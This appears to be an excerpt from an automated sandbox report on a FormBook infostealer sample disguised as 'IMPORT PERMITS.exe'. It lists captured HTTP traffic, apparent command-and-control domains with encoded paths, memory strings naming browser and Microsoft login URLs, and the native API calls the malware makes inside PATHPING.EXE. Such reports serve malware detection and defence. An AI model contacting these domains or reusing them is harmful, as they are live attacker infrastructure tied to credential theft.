                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Sat, 02 Nov 2024 07:14:24 GMTserver: LiteSpeedvary: User-AgentData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Sat, 02 Nov 2024 07:14:28 GMTserver: LiteSpeedvary: User-AgentData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 02 Nov 2024 07:14:48 GMTContent-Type: text/html; charset=utf-8Content-Length: 162Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: PATHPING.EXE, 00000007.00000002.4122469051.00000000039D8000.00000004.10000000.00040000.00000000.sdmp, gKZXbGXeVZyo.exe, 00000008.00000002.4122240673.0000000003AB8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://roopiedutech.online/w5is/?Z0WTZ=HbCgM9YcBMttwdZrXhLlY5z1HFkNRQK7DIvCaf9ftWyGunbQ91oOdhxta7T/v
                Source: IMPORT PERMITS.exeString found in binary or memory: http://tempuri.org/GameInfoDataSet.xsdGFinalProjectTV.Properties.Resources
                Source: IMPORT PERMITS.exe, 00000000.00000002.1769285490.0000000006C12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                Source: IMPORT PERMITS.exe, 00000000.00000002.1769285490.0000000006C12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
                Source: gKZXbGXeVZyo.exe, 00000008.00000002.4123927554.0000000005848000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.cmdh1c.xyz
                Source: gKZXbGXeVZyo.exe, 00000008.00000002.4123927554.0000000005848000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.cmdh1c.xyz/6byd/
                Source: IMPORT PERMITS.exe, 00000000.00000002.1769285490.0000000006C12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
                Source: IMPORT PERMITS.exe, 00000000.00000002.1769285490.0000000006C12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                Source: IMPORT PERMITS.exe, 00000000.00000002.1769285490.0000000006C12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                Source: IMPORT PERMITS.exe, 00000000.00000002.1769285490.0000000006C12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                Source: IMPORT PERMITS.exe, 00000000.00000002.1769285490.0000000006C12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
                Source: IMPORT PERMITS.exe, 00000000.00000002.1769285490.0000000006C12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                Source: IMPORT PERMITS.exe, 00000000.00000002.1769285490.0000000006C12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                Source: IMPORT PERMITS.exe, 00000000.00000002.1769285490.0000000006C12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                Source: IMPORT PERMITS.exe, 00000000.00000002.1769285490.0000000006C12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
                Source: IMPORT PERMITS.exe, 00000000.00000002.1769285490.0000000006C12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                Source: IMPORT PERMITS.exe, 00000000.00000002.1769285490.0000000006C12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                Source: IMPORT PERMITS.exe, 00000000.00000002.1769285490.0000000006C12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                Source: IMPORT PERMITS.exe, 00000000.00000002.1769285490.0000000006C12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                Source: IMPORT PERMITS.exe, 00000000.00000002.1769285490.0000000006C12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                Source: IMPORT PERMITS.exe, 00000000.00000002.1769285490.0000000006C12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
                Source: IMPORT PERMITS.exe, 00000000.00000002.1769285490.0000000006C12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                Source: IMPORT PERMITS.exe, 00000000.00000002.1769255784.0000000005B40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.monotype.
                Source: IMPORT PERMITS.exe, 00000000.00000002.1769285490.0000000006C12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
                Source: IMPORT PERMITS.exe, 00000000.00000002.1769285490.0000000006C12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
                Source: IMPORT PERMITS.exe, 00000000.00000002.1769285490.0000000006C12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
                Source: IMPORT PERMITS.exe, 00000000.00000002.1769285490.0000000006C12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
                Source: IMPORT PERMITS.exe, 00000000.00000002.1769285490.0000000006C12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
                Source: IMPORT PERMITS.exe, 00000000.00000002.1769285490.0000000006C12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                Source: IMPORT PERMITS.exe, 00000000.00000002.1769285490.0000000006C12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                Source: PATHPING.EXE, 00000007.00000002.4124302032.00000000075E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: PATHPING.EXE, 00000007.00000002.4122469051.0000000004668000.00000004.10000000.00040000.00000000.sdmp, gKZXbGXeVZyo.exe, 00000008.00000002.4122240673.0000000004748000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://cdn.adm.tools/parking-page/style.css
                Source: PATHPING.EXE, 00000007.00000002.4124302032.00000000075E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: PATHPING.EXE, 00000007.00000002.4124302032.00000000075E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: PATHPING.EXE, 00000007.00000002.4124302032.00000000075E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: PATHPING.EXE, 00000007.00000002.4124302032.00000000075E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: PATHPING.EXE, 00000007.00000002.4124302032.00000000075E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: PATHPING.EXE, 00000007.00000002.4124302032.00000000075E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: PATHPING.EXE, 00000007.00000002.4120881456.00000000006DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: PATHPING.EXE, 00000007.00000002.4120881456.00000000006DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: PATHPING.EXE, 00000007.00000002.4120881456.00000000006DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: PATHPING.EXE, 00000007.00000002.4120881456.00000000006DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
                Source: PATHPING.EXE, 00000007.00000002.4120881456.00000000006DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: PATHPING.EXE, 00000007.00000002.4120881456.00000000006DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: PATHPING.EXE, 00000007.00000003.2232466066.00000000075CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
                Source: PATHPING.EXE, 00000007.00000002.4124302032.00000000075E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: PATHPING.EXE, 00000007.00000002.4122469051.000000000498C000.00000004.10000000.00040000.00000000.sdmp, PATHPING.EXE, 00000007.00000002.4124184578.0000000005BA0000.00000004.00000800.00020000.00000000.sdmp, gKZXbGXeVZyo.exe, 00000008.00000002.4122240673.0000000004A6C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
                Source: PATHPING.EXE, 00000007.00000002.4122469051.0000000004668000.00000004.10000000.00040000.00000000.sdmp, gKZXbGXeVZyo.exe, 00000008.00000002.4122240673.0000000004748000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.ukraine.com.ua/wiki/hosting/errors/site-not-served/

                E-Banking Fraud

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 2.2.IMPORT PERMITS.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.IMPORT PERMITS.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000007.00000002.4121846462.0000000002A10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2056520278.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.4120631323.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.4121706840.00000000008C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2058360059.0000000001750000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.4123927554.00000000057E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.4121787054.0000000004A50000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2058495171.00000000035D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_0042C343 NtClose,2_2_0042C343
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_01422B60 NtClose,LdrInitializeThunk,2_2_01422B60
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_01422DF0 NtQuerySystemInformation,LdrInitializeThunk,2_2_01422DF0
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_01422C70 NtFreeVirtualMemory,LdrInitializeThunk,2_2_01422C70
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_014235C0 NtCreateMutant,LdrInitializeThunk,2_2_014235C0
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_01424340 NtSetContextThread,2_2_01424340
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_01424650 NtSuspendThread,2_2_01424650
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_01422BE0 NtQueryValueKey,2_2_01422BE0
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_01422BF0 NtAllocateVirtualMemory,2_2_01422BF0
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_01422B80 NtQueryInformationFile,2_2_01422B80
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_01422BA0 NtEnumerateValueKey,2_2_01422BA0
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_01422AD0 NtReadFile,2_2_01422AD0
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_01422AF0 NtWriteFile,2_2_01422AF0
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_01422AB0 NtWaitForSingleObject,2_2_01422AB0
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_01422D00 NtSetInformationFile,2_2_01422D00
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_01422D10 NtMapViewOfSection,2_2_01422D10
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_01422D30 NtUnmapViewOfSection,2_2_01422D30
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_01422DD0 NtDelayExecution,2_2_01422DD0
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_01422DB0 NtEnumerateKey,2_2_01422DB0
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_01422C60 NtCreateKey,2_2_01422C60
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_01422C00 NtQueryInformationProcess,2_2_01422C00
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_01422CC0 NtQueryVirtualMemory,2_2_01422CC0
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_01422CF0 NtOpenProcess,2_2_01422CF0
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_01422CA0 NtQueryInformationToken,2_2_01422CA0
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_01422F60 NtCreateProcessEx,2_2_01422F60
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_01422F30 NtCreateSection,2_2_01422F30
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_01422FE0 NtCreateFile,2_2_01422FE0
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_01422F90 NtProtectVirtualMemory,2_2_01422F90
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_01422FA0 NtQuerySection,2_2_01422FA0
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_01422FB0 NtResumeThread,2_2_01422FB0
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_01422E30 NtWriteVirtualMemory,2_2_01422E30
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_01422EE0 NtQueueApcThread,2_2_01422EE0
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_01422E80 NtReadVirtualMemory,2_2_01422E80
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_01422EA0 NtAdjustPrivilegesToken,2_2_01422EA0
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_01423010 NtOpenDirectoryObject,2_2_01423010
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_01423090 NtSetValueKey,2_2_01423090
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_014239B0 NtGetContextThread,2_2_014239B0
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_01423D70 NtOpenThread,2_2_01423D70
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_01423D10 NtOpenProcessToken,2_2_01423D10
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02D14340 NtSetContextThread,LdrInitializeThunk,7_2_02D14340
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02D14650 NtSuspendThread,LdrInitializeThunk,7_2_02D14650
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02D12AD0 NtReadFile,LdrInitializeThunk,7_2_02D12AD0
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02D12AF0 NtWriteFile,LdrInitializeThunk,7_2_02D12AF0
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02D12BF0 NtAllocateVirtualMemory,LdrInitializeThunk,7_2_02D12BF0
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02D12BE0 NtQueryValueKey,LdrInitializeThunk,7_2_02D12BE0
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02D12BA0 NtEnumerateValueKey,LdrInitializeThunk,7_2_02D12BA0
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02D12B60 NtClose,LdrInitializeThunk,7_2_02D12B60
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02D12EE0 NtQueueApcThread,LdrInitializeThunk,7_2_02D12EE0
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02D12E80 NtReadVirtualMemory,LdrInitializeThunk,7_2_02D12E80
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02D12FE0 NtCreateFile,LdrInitializeThunk,7_2_02D12FE0
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02D12FB0 NtResumeThread,LdrInitializeThunk,7_2_02D12FB0
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02D12F30 NtCreateSection,LdrInitializeThunk,7_2_02D12F30
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02D12CA0 NtQueryInformationToken,LdrInitializeThunk,7_2_02D12CA0
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02D12C70 NtFreeVirtualMemory,LdrInitializeThunk,7_2_02D12C70
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02D12C60 NtCreateKey,LdrInitializeThunk,7_2_02D12C60
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02D12DD0 NtDelayExecution,LdrInitializeThunk,7_2_02D12DD0
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02D12DF0 NtQuerySystemInformation,LdrInitializeThunk,7_2_02D12DF0
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02D12D10 NtMapViewOfSection,LdrInitializeThunk,7_2_02D12D10
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02D12D30 NtUnmapViewOfSection,LdrInitializeThunk,7_2_02D12D30
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02D135C0 NtCreateMutant,LdrInitializeThunk,7_2_02D135C0
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02D139B0 NtGetContextThread,LdrInitializeThunk,7_2_02D139B0
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02D12AB0 NtWaitForSingleObject,7_2_02D12AB0
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02D12B80 NtQueryInformationFile,7_2_02D12B80
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02D12EA0 NtAdjustPrivilegesToken,7_2_02D12EA0
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02D12E30 NtWriteVirtualMemory,7_2_02D12E30
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02D12F90 NtProtectVirtualMemory,7_2_02D12F90
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02D12FA0 NtQuerySection,7_2_02D12FA0
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02D12F60 NtCreateProcessEx,7_2_02D12F60
